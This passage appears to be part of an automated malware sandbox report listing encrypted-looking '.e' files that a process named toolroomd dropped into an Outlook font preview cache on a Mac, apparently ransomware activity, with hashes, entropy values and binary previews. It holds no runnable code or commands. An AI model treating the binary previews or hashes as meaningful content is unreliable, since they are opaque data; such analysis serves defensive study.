Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a...e...'B.>..F.K..0..>..w?...pg.i...~..>....K........2.s.$J}......oF..rn....#..r].vM.T.3J.DCaTq.x.'.o.:z.g.%.....m.....v0.=..N<R.,......."......D.6..........Q....?....#.(..M}...A....o]:(..\|....7&.t..U.b.GU.O-.P;.......A...6.x.r.Z...L...R..sq.\....E1I_q...y.+..W@.}.W\.O.#."4VT......p.}.4N.$L....I7R\.:?...4;(o+.=.x......Bn....,$R3_....[.....wm+.....H`6f...Mv...@...r......f,\...w....AjUlcT..........X.'/.....D.(."].j.....>...aZ..;Gys.......2>iI..'....7a.E.31........M...5O!E/:.Z..4....3..\|\....-i3....^..Z..u1&....zO..y.M..>...P....C.S.lH..&2).t..S..A.ia9~NO.x.`H...L.>..yJ..-?.........i..~...v}..9.m.........^.."..n....8....}....S....l2..........2.=...+.{....X..W.-...xPU..%OH....I.&....`.d.K....Mi..7.b..y^9u;]...YUY1....(..4....h..0..3.e...\...B..X...A.N.....n.tn..k.3i...Vau.Y4.<.CA*.A.....m...o`G.P...N3;.M...~...........PDS..gz..2et.g....=.wD8{jY.03.G...7..V..K..R..Y.$4UeL.P'.y..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.ThonburiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1146
Entropy (8bit):	7.261525403869844
Encrypted:	false
SSDEEP:	24:EqvnsHBJTjy3C0zLHC9ibZBGbOGqYcsePc0m7:EqvCBJTvab9ZAbOGqZNpq
MD5:	24F37719F5F672704E68F2B569537ECD
SHA1:	584DEF02620769BCFDC1CC61CF36954FBA0BA35C
SHA-256:	0AA43B5C54DDCA212E3E27685AB7F2F081A4879D9109C79841D75F66375297EE
SHA-512:	6CE9A92B3141F2516E2752554E8FAB4B923908286B7BDBBEE896066554466D9B9BB2DE4DF71E41424B017E3C50B635C082F7C0634BBB18D44C6C0812B3D26A72
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a&..?......x.,?.Z...o.2l..M...M%........;_..)5...i.....E<...@..J...U.O...<$...aZ..;.w.b.n...!/0..lF..6 ....Rp.u>/.h.`.D.m.:LM8_.NKBF.D/YV...0..Q....R..=mX8@.W..XaD...........FI..@....9nxe...gP!lZ..Z.<...7.....L6......e0S..Q...q....&.97.m.....cpT-cX.8@..q...".j.An....?.g.L.\.v7.p.G&....].Wm-.....a..,...m.......R.<......YI.\|C$N`Y.I...d.;T."..}..q..a.1...2...?..B).\|..x..Y50K.6......m..m..2..KJ..EF...>.....%....1...VL...H....%.....''.-w.%i$...+...._F...:.^}U.E~..Ff.>.....?........N......nA{.H.I20E....Y.hQ..+...xW0f...m.d...GG.....K2B.M.p......m..e+....7...C..kI..i.....f%......l...M[.../..q..K...]_.Z..Im0.E.xs..$EZ.F{.U..f+....~z.c....U.g..i<'x.AU.U..n.0....>q..v0.......\..As>..~...-..>V\..~...i.7.......B..(.z.....7.....F.........k"]?....J.\-.........I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Times New RomanRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1962
Entropy (8bit):	7.637939165494386
Encrypted:	false
SSDEEP:	48:Elku5njQSs8VnWU+/1+fl7HLnVv7zpBdAzBpNpq:mku5jQz8FJ+NOVVvP16pu
MD5:	F875D475C12007585AC4CE2BB174F0CE
SHA1:	5A9875F57E11626D042C6B34AB1777450DBD0523
SHA-256:	0594422FF9A4972DD62AD9F63B364CBA13EF5F000BA71FD2CA58629888F0F7AC
SHA-512:	2407956E17D79CBC49AA95C370A659D94047972BFE693B4701085391B2BACC0454F8E00314CB0EF1D3BCCC629CD7D801539A3A8ED4894637429BFB32A0ED733D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..]....w<{\w..#..Y1.._B.?~H...^d..FI.V.3...7_....4.......g..#..^...$.].d.Z...H.$..[.......%....r...na.q...V.y..8.....8.....8....x....b.....D:xPH.].GL.&...\|..l....c..8.f..w..F.. -}!HLt..rT.}.n......h.....c..wy.0.M.n....\......q...'.G..T.;.#V.A.J..N..e..'..tr........t. .tr....)....\|....I.f(>5l.^...O..M... .z...1..1..\|.;...0...z..^0Q...r.s8..h...b..h....H.gi....Lne.^..@...............3...x...P....\|(..r.u..Y&%}g..q).j..~9.2N.ka.......S;....,.>.......Y....m..........09..\.......#~P.p..a?....-].. 3..`.6.l;#.^.b.EC...^Bl.U....e...N.%.(_.i...p-....u".e\...M.G..56 ..'.rj..L....2y....S.Q.3.G+P..2$....1..H}.I~.wB..":.Ho~.#!..t...\.8.U.l.,......AO..#4&.#.T..{.:...1..k+..i.7.?vT..u..\|\.t.$.....?".\|.T...&...B...t...B.....L..k.r.x...r...E.L..]bc.,...N..."...O8...Q.....o..+..mc....T.h.Qg...8....@4..........B..W5....)....aA~~.?..o.D..L(........`3a.-..#f...!6.....7...^.<.....Q....... J6..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TimesRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1034
Entropy (8bit):	7.187437971019923
Encrypted:	false
SSDEEP:	24:EM/8IEAEvPjKrOkZ+vQCIV9h+ikxDJ5HgsePc0m7:EM/8rAgP2SkZ+vXIVT+zdJGNpq
MD5:	C146CB78F464780088AE32EAF2C02FA4
SHA1:	CA943BA9AD94C255260CD82E134982AAC076AF13
SHA-256:	D31F6AFC7CC6A47689A7A42AEE1F72F67A5EC98D435FC4C4FC6379A76D98AB1D
SHA-512:	BB80232F647FC0961951EC27D712D2FA32CD14D12982F52216ADCFEFB356AED65B4936716401D0E0D75C7E2545D2A0BC3E91ABBC63622B4D1D97AA4633C79379
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.7.Xh`-...W.(d.....pvX...7).'....[IM.H...{#..w..Y,.eA.3C...?...L.S.r....,..W..yZ...=]..Dh.Mk.K..L.t...J.;7...k.....x.../S.......~;...8%L.U..H.A/.[5w"..$....`...j.ZU.....m..\S.l....,a..\|.....7..).w..e...U..?5....6.....G.Ic.U..Q..b.....+..nk.l.n4.o..R.r"=\..j.[. ....n.{.Y......vY\.^.....j......./xM....9.g..).v~.$_.n.~........2......#..u.g...I#..-.!4..X.......%s.Y.3.}..FHj..+..W{..D..N....t.:h'&.Ng=~....8.-F.'.....rI....%'.......d,.Q..T._;.P9._..e..= .&..;1.p.NS3.s.v7...r...;!.nR...J..%T....:..7#"e.,OGe}.!g]....o:..b %.....GI.E.c.!gmKu."..S...@....[(.Zv6.R.?EX"...V...k...S...J.....T%f.@.#...m.g.^.U........z..m[..Os.g.I....=.Y.K..Iv)H...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TrattatelloRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1858
Entropy (8bit):	7.62716944654561
Encrypted:	false
SSDEEP:	48:CMW/rcl5pPkLKV6Zq+b5zt2YLD0f/MBOncXVCNpq:CMIo9sXZ5l3FBOgVCu
MD5:	B95084FB0585C92139F5FAC8D73B8115
SHA1:	15DB373FEAD7D0BC5EEDB0CE03AD2A41C10E1086
SHA-256:	AE1E7BDF4B1042F2AECED54A5AB7A729A916DDCC72CB7BB594F93F76BDD74490
SHA-512:	3734273A90211D46F83BB58CAB971662417D82F7F4F5527F419B3E5488896C0CB7303C901CD3F252A650A9439F9499DF773C8C303863F8DEAF91149FF8457F70
Malicious:	false
Preview:	.<.\|.....f.A.......E@.+.Y.{.'.......=!.i .Y.a...R..4Iy"......A.._%.....3....aY.2....v.t..%....-n....1./..{.....+ty...w.>)Y]..v...+.7...dex.8.ubv2.X.k.............G<..B.q@..H[...p...\.-.6kv`K......S...4..z0....q0..q.Bg.>...N.3.-r..~........W.@T}..9.\+05.Mg}&u.e.l.....JV.=c^w~.@G<s.....}E...4.=.M.U.2.Pkp.\|`p-)\\..........,...iD....-. kP?.k.J..k..}..I}..... ..Rx.....W.VA\.}4-.B.....MJ5.......g.....vp..C.J.[..'5.....fr~.}?.YP..&.\.<~....d..g[Q.CC.V..."...Je."/.4...x....Mm.y`..~f=b..F.zW.\|.n.o\|..G.C....\|...5..@...R....\|.A.j...6..1..(..u8.9..k........N@eh.8.T....d.q.A..<..T=..x..k..b9...r.OI(..d.0....O...O.....ij.]2....c.A......Pvcrl".t..K.o.{fc.q;wW..+.A.-.....R..}......I._.%<E......O.J.d1...y..V8e..G7."J.w?/.7......c....7S{...._..\|@....~[#.?.[..@...2\>H..I..M.x.e...!.<.4^....7...J..W...Q...X...O1.L.;..M.I.9u.:R..f.fG...v\|....B.l.....x.....l.8^..UP.4..2.._..(P=.+.D.2K.A....!,n`.2...m..3i...-......^o^..T....`....*,..@....P...n.......{D.^.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Trebuchet MSRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.569776957044259
Encrypted:	false
SSDEEP:	24:EBICPVXPzb6ErFcnJYIZJ6daEYHLcIz1A4UGiTNhRsxpqse39xBOmZDsePc0m7:EuCNfftcnJqMrcIeDsxpqp3pTDNpq
MD5:	87B95CC2B4CD0BE322156D362615A8E7
SHA1:	4689E07777B82A39280904E8294ACDB7F4D607A9
SHA-256:	8A666CC6C9D9AF73CAF2C16869406B8E5E49B0C72713DC3E218E727988A85E67
SHA-512:	214A01A3DBCAC868B35161CD0E6168E007FD4C928C6E7CA419775C3641001C5339A0686DAFC24B4B5FF7208106AC2D7E9904AB1A0F70DBFF899FD1619F4E5F04
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..c..K.....T.a....^....$.v...29..5m.\..TL..g/....V.jv.:....&w.......o.../.p..nQ...QSi>bR...4...j.(t..A4].%S.m....oI..j7.._7.F.E!..{.}....e...i.~p.O.n...??...z.....Q.S.s...6.y(...]~!...\|>.lQ\aeHF.p[.cx.....9.....1.?.(.w.7.L....,.~.....zp..,.S.7..O.J..S.....Q?.ka..Oh.5l#.u..e.3...q....T..5....#.:.`......h."...a(jO...(.7.a._..c.J.~rD0j$..S.[.l#../....4..\|H'.oL.7.f...'...# G........\|..A..D.............!.Wc.0...v.&we........+D..C...c%q.`.v.H\?..M....M,...I."W..{.A....`:..{.+Z....m.jtS&.u.M.}.B.<..MF.(...Q2..4e.d.......F.K.. .i..l... .[X....+$V.}.iT...S.J.c?.{v.Y..#=..nt.`t....N..b.P.~....L.,.f7....[..2.o.X....A....<....s.71...[...:e..3.qb..nT^ ..'L_...\..27..d.M.G.i..(..2g@....e-...]G.d"A.k..^/e.p........9......6#.X/.b.....>..B...W;fp.......m~r..g....x.LB..."....+....E\|........7...ZT..Ai..l.3.h..n.'.C..Y+...z+......F."~GW{./X;..........:C..n.....t`......g.Z.{..:.<h..$*...5.6;.........a..8...t.i.O..F..+

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.TungaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	7.228706604084956
Encrypted:	false
SSDEEP:	12:WQwJ9lygV2dy7GGi9x44HynjgIQAXjZyWCm1COzQDhnZ6IzY9FX6sewLYTc+qGm7:Bwr2s7jiHyjgojYmYwmnUFX6sePc0m7
MD5:	BFF732289A83A7FE6F4E4DBDAD844B8F
SHA1:	9B817CA337F18D59909A389DFE737C94769F0372
SHA-256:	068DBD56E01A43480988FEA0AF3217BC91CEC27286810DFDB52078F70DB9049F
SHA-512:	2C5C90DA7BD910CBE49492FD4AF44FF82C033B3BFFD41343CAD363D3C37BD38FB11869226E2F397E635B44ECDE390FFD08E37DCBE533CBFC434CE31852A6D200
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a>....1,.1D.).c....nee.!7.q..b...\.jdC>,r..;...s.?0...=....}T{lHD<...A...I[.NW].....Xg.......Nx.r\.L6.H..C..."s..}m........~#2R-.-5.!bR:..+ksn.Pg....z....t.d...x..o.n}....$x.....1}.92......p..M+,.z(sP..,.4$PX;.../..C...Nm!..\.;......+.]...1..........}.j. .........h..e.X..g.m#..l.Bp.../.\..q....^12i..SI....\|..."g..Q.W.....a.kG-..4g'V... .:.G.^0.I.._D.Hk<...A/[7.)f.D.-.j.l}O....`]X&.P..0..)x..........o....h.8.I....T..<.b.....[.....b....7)....w..ms#..;..E..?T#........X..\..<I.}}[.ls.C.~..D..R.........H)&JN%..cd......o.X...P...+.7A.p.b..N9.D!..9{.i....F;.i..cm..d.v.=..}....v;PL7_T.H......A.9y.@q.......>.R[5t.{-Y.........P.:...~.%./.]h.br4.X)...[.o....q....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.VerdanaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	7.432648407763295
Encrypted:	false
SSDEEP:	24:EWrgzodYIh3H02hT3NU1pEsiiBnyoI5Ey24dIKwlOsePc0m7:EWMzW7upExiGnVbNpq
MD5:	893A6385EC3C3D533B6A764E43CD1BD9
SHA1:	0A884CC2E22A2CF452BFF03263F180808E2B4BBB
SHA-256:	B44ECC1152FEBEBDC43468DC2AC9410EB39EB00CE017B05E4113A14C80FF0FDD
SHA-512:	FD17F7E96D72DAAE3EB190D7E93D5484CE80C156C3290A2A0E4C74FEC4D439AC1C59087FCD97213F691EDC980D24259D9CEC908FEA009287EF4754D1C7EEC4AF
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aS....e5..i.W3U.:....E.....~..;/.._).....;..B.}.fi..S.....Y.Mw...x..G.e..tP.l....].c(.w.(...!.0.+..,nL..k..f.`...3.Q....eX.2...E..g.7..9p..fgG$..a=R..Q........;....L1....RI_A..)C............nP....Z$&.\|.=I....4."....Y..;.b..!m..(.....E.......$..0...8.</W.?$..F9l@<.ms=u...1.t.....p.>^[v........2..[.......y.T4..h.kus..yg......u...P...n....X..%.%..g....FT.pE. ....4.S....-j....s.8.=.q.DoR.uY..`.....k..W..J.L..$....c....E..d.L.&.'.......d,.[..._.o...Cc....5]S?;;nom"....A._;..9v...a..2h..6U....T....G.AD......+....Y.......B.u....6.N.?.#.....G..wCyb........N!...[.W..?...P..TX..E.0..9.......` .".-.2\.[.E..7...2...fR...b....b...4.....F"...k]..r.(...;.u.j.G<b.+d......Kf....PY.......y`.s..$<....@...o....d..t(>..U...].....#a.>E~.).........TN...pb.EI...e..Y.....,H.l..v.:.z.U...=..S...!j)..6...f.......n...O.h$....I.....P...C.*B....._j..4....up.....j.:C._..;.\4.U!H..@S.,..e...qK.....Yj...._.@..a.K.....v.Y.(...J.\-

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.WaseemRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1338
Entropy (8bit):	7.434742943289287
Encrypted:	false
SSDEEP:	24:9AWNbIpPWTcakihbRA+0Pr9JMHv5ofV2/h0WFBvsePc0m7:91NbePWFJGevGVsdlNpq
MD5:	9ABE4DA27672ECFE6D568BE4A218845A
SHA1:	09FF4343EC5714DE21ADC845A5D18474F59BB351
SHA-256:	B89EBF26BF05CBBEDB431E40F6896F85740A097932E8BAFA872E4C448C98A473
SHA-512:	5FCD20F9BF0D316157B4EB7C0745A777BBCB245E72E0DF631D776E9269D471C536B9E4E80C167763780658625F977F04C9AD6A9115CB737597B3B1C1C2A5DC92
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.au.8..F...i.\|.s..hN...."^.M..p['.@U;......]..?.._..CK..../^n~N.-(...}`...Vzj..(..3.X........#..P\|a0.d:~o..O......uFh#..9...UK..m........._....O........2..d.e.jF^gJY.E....L....`...!].-.]l.iB.P(..rG......(8..<.o...$.R.....QAR0zu..=&..R..]...F....8nr.W...3.....e6...9.h...sYN.u...2.....R..q."=."p..AFV....`b.J...{9V\|.f....!rC.j...y.k ....t...oT....w...jD..`P.6K.X...l._.Ls..w.".C.~~]5e...w..Z.ti..^.l^........#u.......k.~..T.U5M/...(f.%d..v_.....8.R.@.W...oq.:...ter.&....hp......K]..N;J/h....%#.Z..t.w...K>.).6~375pR..RH..B~X\.I...JxQq.I.}.47..j.A.......<.d....)M .s.',!Txb..*........_v..'w...&2U40....,x..\|..NV..#...@..\|z.G.w.E...H....dU....k6y...%...'_C.... .x6p...U...:^...'.w..v.....uw...#.\|......h.d.m.s.tT...(@...._.UB..}.a..g-RT.g.......V...0.1+Z.`.5.YTH....R.,..m.@.P.L=.y..u.H...nvF(.+..7.C.;,T.D..-1...8............L.... .!,Vn.^ 0..%.o-..}j:..6CR.(Q....[..t.-.xD7....t.+..{k.Z......>..D..{

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.WebdingsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1522
Entropy (8bit):	7.507989977091624
Encrypted:	false
SSDEEP:	24:EEmySvfpyYsdMsxyUziQgq1g0mcDvfGw95OqMgvMvfcV6jFdz9WrXsePc0m7:EXhyVxyUO3qeXcDvWfqafcQFdkrXNpq
MD5:	61A27DF5B57B5B547E54725DE92C45D9
SHA1:	4059661ECD25A2A39B8192126A7FA2F65067744C
SHA-256:	34B8A314AE5AD5D794FA9B95FD2500ADEF88E23C56B798FDC8A78AB7B0D6F96C
SHA-512:	0CBC3240C6624CACFB018CFDE453A04D176631FBFA4DB708D62C44492BFB35C23ACB632329D25EA386B7A388C696AFE623A8066C69C60E6D8E6D9C0D28F2FFDE
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.)E.BD..urS.......-...L....._x%...@...v.G..l..w;=.=pY]:..2O.[.[..)V..+z.v....\|@,......I.o./.5....6:.c}...=.....,a.'xXm`{'.P:.V...G.....3.<fB]L..:....H.5-j...g.lGX.(.....~....Os{i.f...W...$~8..#T?...m......?6.................S...(....?L......PY...m.9...W2.,........GO.S....u.:..?...f...=\.Iw....;:!u..@!._J..e.H... .....X..3...>_.R.).s.P...Gai./....b\..`.z.....a..pP\}6.N.B..te0D..d.g.Y...tSO...I.G.....S.q..1u.[.M..D..V..M\|...l>...?.#.....m....a....`u.K....w3..m..W..Su>...hXrHG:.{....4+b.*.&s..c.!}hp..(.7.k.l..."l...$s...wZoH\|b9....].q]{2.;4.+...<.0w.~.xH.8....EP.....s.(8[F.......8.5}.........G.}.(xEw.&r.g.../,..)E,Eu.JSi....lI..i..Pf.!.+:H.u.....>..cO.L}.y........{.dx.h.G... ...`.....[.(6....._...1F..J.3{.$.u..........j.9....e.b.......k"\3o..{0A:.[A.p...........9A.Ht...z.>vB.D...L.l.%k.......UMT.i....T.. ...(.}.y.a..Y~..rl;<.....0.\|-.....6.5.....-...3G.!.fI.S...H.y.M^O_b.h.{`..s.....w...R.....YT`.....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Wingdings 2Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1514
Entropy (8bit):	7.5152706992466785
Encrypted:	false
SSDEEP:	24:EFvkPrOq0WsVE0EYyuVZllDIWWbZIGdRDFhJ/hlln3WUh9ttGsePc0m7:EF+AW2zUuHIZb2GdP/7JWuftGNpq
MD5:	80F8FACFE2ACF076813D45471E94949F
SHA1:	90A66D12453EEA63DF79494F1DA3D0D52062BF72
SHA-256:	1302877755D4126AD04D33F7EF1A6E8751CF39E78188E722362FF821F43D636D
SHA-512:	0EDE28C6E98E61C5559DE768EA6FC967B0EE9ED19F1A97D5B375E89E99C273810785B4AE45EAE60E38BEFAEADABB6184F332B2C2F2D8CE6602EA683653153D09
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...a.P!N.b..z)......s....]W.w\rGB..hMz...I.X........M1....[?rH......5.O...b....f..nwhg^&...@k.@N..ck..\.S.0.NPyh.Z...0@.I....%.t.Z.D.vX3..z.........c~......+..p'...../...j.......g.o9#./..f.i9..9.Y5....".^+.}..}..&...t..<4&.s.x .................H......#.dn.R.......Nu.`. 7.q..h..R...u...7.).r.h.%.EK...=.d....;.....t......j..)..(......#...y.....-zy./Z_V$.......3...SL.....2p.o.......m\M....y.....J..f.F....r....Fp..U.......W.. .Tb..X...W.].j...E...m.idw...,.q.~..Zm.8.B.f.....z...73.R.:.7...\B.a...~k].Y.P..$[.. .........I`.8...H.x.f.]y:k...;H.p......9'`$.0...sW....y._q........'..p....^5.Vy.&.B...y.Z;7...v.J..;.yyn.nj}R....6.y..`Ekja..15.t.C..].........&.......xK.....(..I`..~.Vl.#q...b.~..N......v....k....i.\|L2..Sx..."......h!....F.......-\|._........o...&.z...u?..w/0.>...gp)9...!Q....J..U..\|..C....:..~...N.b..._G...,3{]..E.....,...?..0F.. ]...\...%.~.(.t.eJl..8...M#.:..p.1W^.Q......U"D51jz..z!.j.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Wingdings 3Regular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1538
Entropy (8bit):	7.516562701868853
Encrypted:	false
SSDEEP:	24:EmcJDWZnXgEyKVdQcG4nGZFZvfoA0ClXvEwRBGqsgvYuDf8Zn65sePc0m7:EmEKZnXfE/rtgAv2yrDDfioNpq
MD5:	52D43B16ED1AAB8DE447D61431B1A59B
SHA1:	6DA1CAAB2D84507936F774712AA03451A0160AAA
SHA-256:	844060FE3E86AC0480CF14B8288E79E60C08EB039953952EF888C4BE3F687A64
SHA-512:	F9018398C132778BB4B385C7C2A74A251C5DCBDE994DFDBB23AC32262D0BFD968EEAF0919349885D17AAF822184B9709F03BA627F636B3F24B6CE721952AA058
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aN....y.~....0..N".\|..hn.M....u.=T....M.L3......s.b.y.b...g.'V...1.a/7{.@......E....7..X.....1e."2.,..;.7.:t.......2W..b35..G4x.f......O..E.`{.L$@.c.7....... ............>%\|.IH`.....-l.~.?I.s..s.u.R..4P0)...S..g.=%..\.K..<..>....8..]6WI".B.`."y.N....Sp..a./.v......}..X.....$.........k......./[...+.<U.n.V.E.....fZ"Y.A..9.R0%.f....lu.:D.......a..v.RV.R....f/TV.Lx.d.m.K.0.bY.......}.~.... ..H.\....m....0...+>%..;...D...T..t..m..`..i.w.Ya/h......\|93.f.....e.Ct.OZ.].....NN.<.(6...ZO.i&.<...S....6.b.Z.. ......h....8yf. ....!..+q...c....a./...#...O.)...X;s....(...&.....M.7.......'....&...g'cH;UK..........).S&..+T..7N.l.o..W@....b.,.9)...A."...X....*...,Q.,-w\|...M..X..0m........_e=j..l...j?=<N.....PH.....M.a..{.R6l..Asp.>.u....^$..H..n..No.....\|.yK.....!..dU...8.[.Z..k...4..Q.$...U...S..b...."d$.'k...2.5.eD...w.....>...V.b.9.........d..,D...w0a......V..'c(.I...h...F>.J:_N..~...P.j!.'6>.].Y.u..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.WingdingsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.450142827887951
Encrypted:	false
SSDEEP:	24:ENlwims9aGUvW/6fa6GxilvUFj8vRvoKQzMSM52EFcdm5J+dFnsePc0m7:ENlwbs8GGW/6fatUyFQvRgHzMSEFcd+V
MD5:	CD8AA937011C4800D82861867D04D9C1
SHA1:	FE1155E2A20268BBAC130F33DDCF0DAF747F0307
SHA-256:	89383E093E693DC4B852DB0E6792B54785993491CF2C4880E0F474925E149C09
SHA-512:	03EC378BC3A57240182DE2F119ED299EDB63B8FC875F531A488420BA3FDCD60B44DD332BFAC5CF1BBB157A694CA247E29C49E1667643862667C0B0E14AD264ED
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a./...}.?q!.p...i.....#0..T..2......a.<eWpqi..y....A.+..}(....d.?~...C.K.J.../..%m...Wd.!e)...l......m.U....iG..$X>.....e.r.X`..DAL...2.....i).GPK;......OP..)\F...3;..Q.......B...[v...x...uN<....\|......f..4VXs.oF;...c..G.C..f.[..1.tJ.r1g.+....'{0...R}....D........mi...V'J..T...&f.;$...g.......h.-....P.m....0.UL....b...[..=U.N.........L..c......r.>.}......1.....)...:.-0....K...f...1...].....'>\.A.Cv6.....m.&kp.S..#.f6...bA>.4.'0.D..:-.5.. qY......WB9...f?...,.8.;.,...[.\|..a...H.7...w!9...e.I{..s"#/..<..Ddo.@..9.i.....'.R.x....9{QR..6.B.9...J.....VB..6.jU.?..[......L...4..&..{.OH8_;..!&.x.Op\.O.../.&.&%vx.....o..=......6..9d=C..#.F.0..O[.@..[....b.....D._......i...,K~.t...l0..D..;X.e..1f..L..D.]..^n......A....z.....C.ty.H?.N.i...o..U..SBgmi....F.<..g....+.h...7..p~..FUko$..-.iE..E..Z....[/.R..rr...,X>.c......3...1k.8...HQ..~..^<.e...<h-..T....$.....`/.....\|....9.`\.f..D.Xc..O/...../...F.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Yu Gothic UIRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.453203266817774
Encrypted:	false
SSDEEP:	24:EYb2NurjP//rKPV9PYGgwc35fKtm0O8A6bMnIsePc0m7:EYSNurjH/YV9Q5HAtvrbMINpq
MD5:	E25D1EE8E8556EACF42858822147DFE7
SHA1:	D5BB59DC7794DCC1C094D4B87AF2169FCA884478
SHA-256:	782D9B8B104422AE8EA0CB3F66326085840142380BE01319F96AD157BBF26ED1
SHA-512:	3F159F873CE6C0445559FE3BB5AA8CCA52372C79212EEEE33BE147618545CD513A3E01C719E3D504F2DBF718EE72D1503FF24D5D731981D80E2549D5943A3936
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.wc.P.#..".Jb.....j.....~.....Q..yo.Me.......=lV..F}..j.(9..x....)...n.....4...2b8R......@.O..:.]...p..o..<...Uv........6t....SK>N]/.z_...W..q<.J`.DNF..U.O>......w..'{..j........+\...rXT.`.m..u....._.n.ti...........".xe&C.X...U.....%.W...yu..P..c.).$b..a.w...V...A..n.Q...(..t....90.u'.t&#H....T..4...px....>g..E..z......_......Y.c..M.S..-..g..'........y.z..P`..\.......5.....A..j....O...2.I`.v...([ ..zKgv.?. ...=..3w...L..L.s..X.^.:....@S.)."b......rt..'S...P_=P .{.\M..`i&.........^.G.....(....`.2.p.AgQ..4.kK.}/1.3....p.9.8. .\...&...a..n(X.9!...6.v..gb...Sy....!A. ...&h.........x.M.P...^8~.....r.O..P.)=..'E......z.,t]k.l)j"]7..9L....qg....n...<..4.V.Y..R...>?..T.-P`..>.x..e.......t,...."&AfS8.k_..K..s~...5...O...F...:...E....i..P...<...H..(.@..........^._..>.AH...t..Ad..%-F.&eR.I.c.= bp!.3K.]..X..J%..0...6...v;..b.I..X.d.d....u..Y..y...Z_v....?4Yc.c.....u.Ni...f.cn.%...3N!Ab.........Q4>,...n,.8.....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Yu GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1250
Entropy (8bit):	7.35308927999071
Encrypted:	false
SSDEEP:	24:E2aFZXHaMwqqPESAAWLyAkl4emt/Y7MQkJm02raEZFpZNExsePc0m7:E2WKjRyR6W/OMtJwDDNGNpq
MD5:	AA71D125A46F297E1ED80CE2477B18FE
SHA1:	985196CC3927128D83B475B02128A0454F826250
SHA-256:	9594FFDF3ACB414F9ABA8EFB2FE1136B14011264D42EDE574C8F232ECDE7F0E4
